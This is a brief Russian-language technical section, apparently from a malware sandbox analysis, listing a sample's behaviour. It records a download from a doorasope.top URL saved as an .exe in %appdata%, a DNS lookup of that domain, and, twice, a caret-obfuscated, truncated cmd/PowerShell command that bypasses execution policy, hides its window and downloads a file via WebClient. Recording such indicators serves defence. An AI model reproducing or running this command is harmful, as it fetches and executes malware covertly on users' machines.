Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^ERsH^El^l.eX^E^ -^E^X^EC^u^t^iO^NP^OlICy B^y^Pass -nOP^rOF^IlE -^wi^NdOW^st^YlE^ Hi^D^dEn^ ^(NEW-^O^B^j^e^Ct ^S^ys^t^em^.nEt^.WEB^cl^Ie^Nt).^do^WNLoAdFiL^E^('http:/...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^ERsH^El^l.eX^E^ -^E^X^EC^u^t^iO^NP^OlICy B^y^Pass -nOP^rOF^IlE -^wi^NdOW^st^YlE^ Hi^D^dEn^ ^(NEW-^O^B^j^e^Ct ^S^ys^t^em^.nEt^.WEB^cl^Ie^Nt).^do^WNLoAdFiL^E^('http:/...' (со скрытым окном)